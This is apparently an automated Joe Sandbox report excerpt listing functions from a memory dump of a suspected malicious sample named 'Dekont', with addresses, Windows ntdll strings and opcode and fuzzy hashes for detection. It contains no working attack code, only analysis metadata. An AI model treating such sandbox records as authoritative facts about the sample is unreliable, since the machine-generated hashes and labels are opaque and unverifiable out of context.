                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 320362787e2c56c1701af1d97f116f65b3c5f0c20eabf3288d8eb4bc9bbcc781
                                  • Instruction ID: f480490e98fb9d61fa4446f87c239f1c313c8e0d987b2a745c17c6bb3838db13
                                  • Opcode Fuzzy Hash: 320362787e2c56c1701af1d97f116f65b3c5f0c20eabf3288d8eb4bc9bbcc781
                                  • Instruction Fuzzy Hash: D331E772900611AFFF73BB0CC889A6976E4BB01754F0641A7D7C4D72D1E7A4DD808799
                                  Function 00FF245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • apphelp.dll, xrefs: 00FF2462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0103A9A2
                                  • LdrpDynamicShimModule, xrefs: 0103A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0103A992
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 8ae28a93f342d4dfe80fcd010d14c4046db3f0173930c1e2e0745c41d8c00e7f
                                  • Instruction ID: 6201a1bac259867e0dea57d5bb6b0c002b4a352c8dcbaeb960e5bf85c0eb4779
                                  • Opcode Fuzzy Hash: 8ae28a93f342d4dfe80fcd010d14c4046db3f0173930c1e2e0745c41d8c00e7f
                                  • Instruction Fuzzy Hash: 98314872B00201EFD731DF599845AAABBB8FFC4B14F15415AE9C0AB255C7B59841DF40
                                  Function 00FE29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 00FE3255
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FE327D
                                  • HEAP: , xrefs: 00FE3264
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: 7bf4f11fd4608c2a59e2f315fc29886dd371314ef6092a4d58febf523fa9b1f0
                                  • Instruction ID: 726f22855c2bb701c57ad83ab31624b95def22f87943d21cf97c0707a11a4f9f
                                  • Opcode Fuzzy Hash: 7bf4f11fd4608c2a59e2f315fc29886dd371314ef6092a4d58febf523fa9b1f0
                                  • Instruction Fuzzy Hash: D292D071E042899FDB25CF6AC448BADBBF1FF48314F188069E885AB391D735A941EF50
                                  Function 00FE0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: 38acb3b4040d3449b1b08b9b4c77e11108ec7447a2ae3e97e7832d26bada4ff4
                                  • Instruction ID: 12ab41263079067efd68194ad79507f8eb9fb5f5d349f72a7291f9f40006653f
                                  • Opcode Fuzzy Hash: 38acb3b4040d3449b1b08b9b4c77e11108ec7447a2ae3e97e7832d26bada4ff4
                                  • Instruction Fuzzy Hash: 93F1D031A00646DFDB25CF69C894B6AB7F5FF85300F1481A8E4869B392DB74E981DF90
                                  Function 00FF6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: $@
                                  • API String ID: 2994545307-1077428164
                                  • Opcode ID: 07aadf7869bb5f6e94c0997619656f00025e0b5127e0c7d4256a4b5dd01a85c9
                                  • Instruction ID: d0686541125cd26b9f9f6d6f93e35b41cab3b573d975b523178fcb3ebc9b1368
                                  • Opcode Fuzzy Hash: 07aadf7869bb5f6e94c0997619656f00025e0b5127e0c7d4256a4b5dd01a85c9
                                  • Instruction Fuzzy Hash: 05C29E72A083459FE725CF28C841BABBBE5AFC8714F04892EEAC9D7251D774D804DB52
                                  Function 00FCA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: 731fdbbe80c186e32de2ca205fef6b803aae1a20ece0dae552aafb90fe2201e0
                                  • Instruction ID: d4abf4ccd6e5cbd6987f16740020630ce470a086f28cff6fe337b81a9b1b9f81
                                  • Opcode Fuzzy Hash: 731fdbbe80c186e32de2ca205fef6b803aae1a20ece0dae552aafb90fe2201e0
                                  • Instruction Fuzzy Hash: BDA16B719012299BEB319F28CD89BEEB7B8FF44714F1041E9E949A7250DB35AE84CF50
                                  Function 00FF0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpCheckModule, xrefs: 0103A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0103A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 0103A10F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: 13511bd791a50fafe40918ed00c639d3b259ade72bdee0ad48427d3412a394bb
                                  • Instruction ID: bf8b41b419c73827b84248b8f1ce45c1ee32138a2798a7267db94c79f0020cea
                                  • Opcode Fuzzy Hash: 13511bd791a50fafe40918ed00c639d3b259ade72bdee0ad48427d3412a394bb
                                  • Instruction Fuzzy Hash: E471C071A00209DFCB24DF68C981ABEB7F4EF84704F14416DE982DB266DB39AD41DB51
                                  Function 00FE0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 146631f5c8321d02b701569781fe6d4accb0ea7d582f6ce5fb4669534a07ff99
                                  • Instruction ID: 6408b66a8b30f03cf52fc35ca0bd5628a077093b11fc94d08c1cebc1f5114156
                                  • Opcode Fuzzy Hash: 146631f5c8321d02b701569781fe6d4accb0ea7d582f6ce5fb4669534a07ff99
                                  • Instruction Fuzzy Hash: 8A61D171600345DFDB28CF29C841BAABBE5FF85704F148469E499CF292DBB4E881DB91
                                  Function 00FCCCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FCCD34
                                  • @, xrefs: 00FCCD63
                                  • InstallLanguageFallback, xrefs: 00FCCD7F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: 5c2e8f169867866c3dab1f6ee8480146a1ebbcf60769901bce773f6812c843c2
                                  • Instruction ID: 52b5b7d71e5d5a68d1f9839a6c14aea93bfd081c95a62c7a4d4b3092865e66a0
                                  • Opcode Fuzzy Hash: 5c2e8f169867866c3dab1f6ee8480146a1ebbcf60769901bce773f6812c843c2
                                  • Instruction Fuzzy Hash: AB51D376604356DBC711DF24C854BABB7E8BF88714F00096EFAC9D7240EB34DA0497A2
                                  Function 0100C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010482DE
                                  • Failed to reallocate the system dirs string !, xrefs: 010482D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010482E8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: 6e7c1f3eef2f7a497fbc787208190e4893f1df2e7e0f12593d311db99add663d
                                  • Instruction ID: 16994f3eb65af17add6039918aceab1d170636b6399fac57bb819bff4e5ff1bc
                                  • Opcode Fuzzy Hash: 6e7c1f3eef2f7a497fbc787208190e4893f1df2e7e0f12593d311db99add663d
                                  • Instruction Fuzzy Hash: 754114B1144300AFE732EB68DD45B5B77E8BF48750F004A6ABAC8D3291EB79D8009B91
                                  Function 0108C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 0108C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0108C1C5
                                  • PreferredUILanguages, xrefs: 0108C212
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: 27a1736594f0dcfe0abf4588637cd2eebbc0f5e2f03fd4c407e3c68a598c3f27
                                  • Instruction ID: d93ed89ba02a7333bd29ac9e1d42036bcda75da96476c7b78d73dfa8816e6945
                                  • Opcode Fuzzy Hash: 27a1736594f0dcfe0abf4588637cd2eebbc0f5e2f03fd4c407e3c68a598c3f27
                                  • Instruction Fuzzy Hash: 1B418871D04219EBEF51EBD8C981FEEB7F8AB54710F14406AE685B7280D7749E44CB60
                                  Function 01064144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: 7bfb1b32ff1c4fb3f009701160fab8115fc78bde876b11590faa91cfe64d981b
                                  • Instruction ID: dfe39f99aee62af49616c281d6f5d850ab1b5cd759181dbe0893130b6c351dec
                                  • Opcode Fuzzy Hash: 7bfb1b32ff1c4fb3f009701160fab8115fc78bde876b11590faa91cfe64d981b
                                  • Instruction Fuzzy Hash: 0F41E131A04299CBEB21DB99C844BADBBF8EF95340F24049AD981EF792D7388941CB10
                                  Function 01054755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01054899
                                  • LdrpCheckRedirection, xrefs: 0105488F
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01054888
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 3c430212c61ca7c894e014ea24f375869325b4686c08f43363c08437c1a8026a
                                  • Instruction ID: 6687eede79e672440aae9caf6ad1543308a16f86161855a7a53087d64d30f638
                                  • Opcode Fuzzy Hash: 3c430212c61ca7c894e014ea24f375869325b4686c08f43363c08437c1a8026a
                                  • Instruction Fuzzy Hash: 0241B032A043559FCBA1CF68D840AAB7BE4FF49A50B0506A9EDC8D7351F731E880CB91
                                  Function 00FE0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 8222b75b33fdf8fad71510654539eb6a36e905e4c97c9db16854d50806947cab
                                  • Instruction ID: ba690226ac0f7f1196991447c79cc46fdca9c2cfef1034f67fd6b03b1c263df5
                                  • Opcode Fuzzy Hash: 8222b75b33fdf8fad71510654539eb6a36e905e4c97c9db16854d50806947cab
                                  • Instruction Fuzzy Hash: 9B11AF313151829FDB2CD615CC52F6AB3A8EF81B29F14816DE446CB2A1DF74E881E751
                                  Function 010520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitializationFailure, xrefs: 010520FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 010520F3
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01052104
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: 23a189248b769fd3910dd21f826d56e84c0011838a39370e9775cf99aaf7d076
                                  • Instruction ID: 84d5dd34e0795b3346eff8896a15aa235a2a0bd9feeafba95bcd4039fc3df5e8
                                  • Opcode Fuzzy Hash: 23a189248b769fd3910dd21f826d56e84c0011838a39370e9775cf99aaf7d076
                                  • Instruction Fuzzy Hash: 79F0FF74640208ABE760E60CDC46FDB37A8FB50B44F100065FA80AB285D2B4E900CE91
                                  Function 00FE03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: 764a500ba184ae652fd31a55f8ae86bf1b733457ba2d45e40098610908bfc4d8
                                  • Instruction ID: 9ac627d8c5e687639af79bfbcb7e6eb4e9e3f0a89596368741b4f66b97760363
                                  • Opcode Fuzzy Hash: 764a500ba184ae652fd31a55f8ae86bf1b733457ba2d45e40098610908bfc4d8
                                  • Instruction Fuzzy Hash: 48718B71A0014A9FDB11DFA9C984BAEB7F8FF48304F140065E940EB251EB38EE41CB60
                                  Function 00FDA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 00FDAA25
                                  • LdrResSearchResource Enter, xrefs: 00FDAA13
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: ba7cdd053613ccef90d3d08dbdcbd87847821e7de5057bde716929d3c7bff99f
                                  • Instruction ID: b4764860d0953d8bfb397ecbfd51cfb6646f7b94e7329e5893d04fdc754a50d5
                                  • Opcode Fuzzy Hash: ba7cdd053613ccef90d3d08dbdcbd87847821e7de5057bde716929d3c7bff99f
                                  • Instruction Fuzzy Hash: C8E19F72E00219DFEB218B98C980BAEB7BABF84310F180167F941EB341D7789941EB55
                                  Function 0109A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: fffe39a2bc08cfa75faeee5b568573bce3535722c6c2d17f89bc8ea8e72a5e81
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 41C1BD31304346DBEB25CE28C851B6BBBE5AFC4318F188A2DF6D68B290D775D505DB81
                                  Function 0104E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: e57b52d615f70bcb827186d916f833b053c730868d38ea2d7d63a88b69bc5bde
                                  • Instruction ID: 3880c31cf54af8c927b26174487bfe9d7aac421aebe19cec472d5b07beee2918
                                  • Opcode Fuzzy Hash: e57b52d615f70bcb827186d916f833b053c730868d38ea2d7d63a88b69bc5bde
                                  • Instruction Fuzzy Hash: 5A614CB1E006199FEB15DFA9C880BADBBF5FB44700F64407DE689EB291D735A900CB50
                                  Function 010743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 9fb47afc8fe0e0539959a432ee39bbc96a366c96501387921a95d52d378d7073
                                  • Instruction ID: 5a5b4a0abf8298aee5d3151965cc02a89d161a6e3525707fe3793ea341ba1f3b
                                  • Opcode Fuzzy Hash: 9fb47afc8fe0e0539959a432ee39bbc96a366c96501387921a95d52d378d7073
                                  • Instruction Fuzzy Hash: E65147B1E0021DAEDB11DFA9CC80AEEBBBCFB44754F10052AE651F7291D7359A05CBA0
                                  Function 00FD04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FD063D
                                  • kLsE, xrefs: 00FD0540
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 3a914b2a1f01fb116ca306389939b5433d85327910d006cce9fae0214734fcf9
                                  • Instruction ID: 65bef89ed1dcad64aae71ac02176b42617d92ebc193f9c2cc9fd3f7d6666a7d9
                                  • Opcode Fuzzy Hash: 3a914b2a1f01fb116ca306389939b5433d85327910d006cce9fae0214734fcf9
                                  • Instruction Fuzzy Hash: 2451AA719047469BC724EF24C4407A7B7E6AF84320F08493EEADA87380EB74E945DF92
                                  Function 00FDA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00FDA309
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00FDA2FB
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: af85caf8880ad4d041a30a7e92913982ea0d5e216544fbe1756703c83e7f09c9
                                  • Instruction ID: 39bf76dc23584134021935aff5d7dbefe54b8fee9eae0fd9831724b490c4ddb1
                                  • Opcode Fuzzy Hash: af85caf8880ad4d041a30a7e92913982ea0d5e216544fbe1756703c83e7f09c9
                                  • Instruction Fuzzy Hash: 5E410131A00649CBDB25CF59C844BAE77FAFF85710F2840AAE840DB391E336CA00EB55
                                  Function 0100A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: a331b6c85bc367521237dbcff977d1ebf149ad5235ea9dc0306a8331943eeacc
                                  • Instruction ID: 12bffd034789bf41440dbf912ecda275e072fab07971c42de9a2179a63e342f5
                                  • Opcode Fuzzy Hash: a331b6c85bc367521237dbcff977d1ebf149ad5235ea9dc0306a8331943eeacc
                                  • Instruction Fuzzy Hash: 8B01ADB2240700EFE322DF14CD45B2677F8E789B15F008939A688CB1D0E735D804CB46
                                  Function 00FDC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: b92551c932c6cfcc6262796c19783216f21805865369c877dde804bd4ed95911
                                  • Instruction ID: d2c42324bcc63e9219ec0271e743814c2e0d80db0cfca593c56c67436b26525e
                                  • Opcode Fuzzy Hash: b92551c932c6cfcc6262796c19783216f21805865369c877dde804bd4ed95911
                                  • Instruction Fuzzy Hash: 3C824C75E002198FDB24CFA9C884BEDB7B6BF45310F28816AE859AB354D7349D41EB90
                                  Function 01056420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 8a0948948101d7cd7fbcef3bd7682dab3924282c64b3fb9546dff8c88cc98ddf
                                  • Instruction ID: 3af50e7ba51bd7b3a250ab5940eed508e7051c0fad4f18a941eac82fd3dcc839
                                  • Opcode Fuzzy Hash: 8a0948948101d7cd7fbcef3bd7682dab3924282c64b3fb9546dff8c88cc98ddf
                                  • Instruction Fuzzy Hash: 699151B2A40219AFEB21DB95CD85FAF7BB8EF08B50F500055FB41AB191D775AD00DBA0
                                  Function 0107E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 3ccf1f86b6d3021ee66a94f9de20688dfbf60a3849057c47a05b55471c7a92db
                                  • Instruction ID: f5f5651f01c63570193ecc7fa46a28eb5d2050e7ee34897a4ed46dfdb77a1c00
                                  • Opcode Fuzzy Hash: 3ccf1f86b6d3021ee66a94f9de20688dfbf60a3849057c47a05b55471c7a92db
                                  • Instruction Fuzzy Hash: 7291E231D02649BEDB22ABA4DC48FEFBBB9EF45740F100065F641A7261DB359902CB54
                                  Function 0100A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: 0ed03a3da4ad73f0769a6015c2bc77c657f6eafd1e76e1894b088fdb5a7a3b42
                                  • Instruction ID: 7e9e9f368c7be91036bbd4431514d9e86faabae364df83cb9c6ffc8309400a39
                                  • Opcode Fuzzy Hash: 0ed03a3da4ad73f0769a6015c2bc77c657f6eafd1e76e1894b088fdb5a7a3b42
                                  • Instruction Fuzzy Hash: 0F716AB5E0020A9FEF68CF98C9906ADBBF1BF49710F14817EE985A7241E7369941CB50
                                  Function 01074978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  • Opcode ID: fd8ac19e5fa23fa3d85f509b9a6f4ed40223e4d388157b4608d1cf26d6909a05
                                  • Instruction ID: 0d47206a8e707271c9d63f2be8906bd18cb7187d765f7a48369d2f88a3e20e01
                                  • Opcode Fuzzy Hash: fd8ac19e5fa23fa3d85f509b9a6f4ed40223e4d388157b4608d1cf26d6909a05
